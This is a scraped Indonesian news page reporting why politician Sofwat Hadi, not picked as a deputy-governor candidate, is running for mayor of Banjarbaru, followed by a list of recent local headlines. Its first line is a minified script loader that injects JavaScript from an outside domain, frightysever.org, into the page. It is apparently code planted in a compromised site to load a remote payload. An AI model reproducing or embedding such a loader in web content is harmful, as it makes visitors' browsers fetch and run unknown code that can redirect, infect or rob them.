(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Politik

Tak Dilirik Bakal Cagub, Alasan Sofwat Hadi ‘Turun Gunung’ ke Pilwali Banjarbaru


BANJARMASIN, Setelah sebelumnya berupaya maksimal mendaftar untuk mengincar posisi bakal calon wakil gubernur, ternyata politisi gaek Sofwat Hadi tidak dilirik oleh bakal calon gubernur. Sebagai gantinya, mantan senator utusan Provinsi Kalimantan Selatan ini memutuskan untuk ‘turun gunung’ bertarung di Pilwali Banjarbaru.

Kepada Kanalkalimantan.com pada Selasa (10/12) siang usai penyerahan berkas formulir pendaftaran bakal cagub Denny Indrayana, Sofwat Hadi membeberkan alasannya untuk memilih bertarung di Kota Banjarbaru.

“Karena calon gubernur terlalu lama untuk memutuskan siapa yang menjadi wakil gubernurnya,” kata Sofwat Hadi, Selasa (12/10).

Sehingga, jika Sofwat menunggu lama untuk kepastian apakah dirinya dipinang bakal cagub. Ia tidak ada waktu untuk ikut serta di pemilihan bupati ataupun walikota. Karena baginya, baik calon petahana H. Sahbirin Noor maupun Denny Indrayana belum memastikan siapa calon pendampingnya.

Apakah menunggu pinangan menjadi bakal cawagub mengulur waktu? “Bukan, tapi banyak yang dipertimbangkan karena saya juga khawatir tidak memiliki waktu untuk ikut pilkada, saya mencalon saja di pilwali Banjarbaru,” ucapnya.

Ketika ditanya soal formulir pendaftaran bakal cawagub yang telah ia ambil di beberapa partai politik, Sofwat menyebut tidak akan diproses lebih lanjut. “(Pendaftarannya) tidak diproses lebih lanjut,” katanya.

Lalu, mengapa memilih bertarung di Kota Banjarbaru? Sofwat menuturkan alasannya yaitu, dengan jumlah pemilih yang tidak begitu banyak, tidak membebani dirinya untuk bertarung. “Tidak terlalu berat untuk sosialisasi dan kampanye. Itu saja,” tegasnya.

Mengingat di Kota Banjarbaru sudah ada calon petahana Nadjmi Adhani-Darmawan Jaya Setiawan maupun penantang seperti Aditya Mufti Ariffin-AR Iwansyah, Sofwat mengaku tidak khawatir dengan keputusannya bertarung di Banjarbaru bergandeng dengan dr. Abdul Halim. “Justru (calon) petahana yang khawatir dengan saya! Bukan saya yang khawatir, kalau saya khawatir saya tidak maju,” pungkasnya.

Sejauh ini, pasangan Sofwat Hadi-Abdul Halim telah mendaftar di Partai Gerindra, Nasdem, PKB, PKS dan PAN Banjarbaru. (fikri)

Reporter : Fikri
Editor : Chell


Desy Arfianty

Recent Posts

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

2 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

2 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

4 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

6 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

7 jam ago

Waket I DPRD Kapuas Apresiasi Pawai Budaya

KANALKALIMANTAN.COM, KUALA KAPUAS - Wakil Ketua I DPRD Kabupaten Kapuas Yohanes sangat mengapresiasi kegiatan pawai… Read More

8 jam ago

This website uses cookies.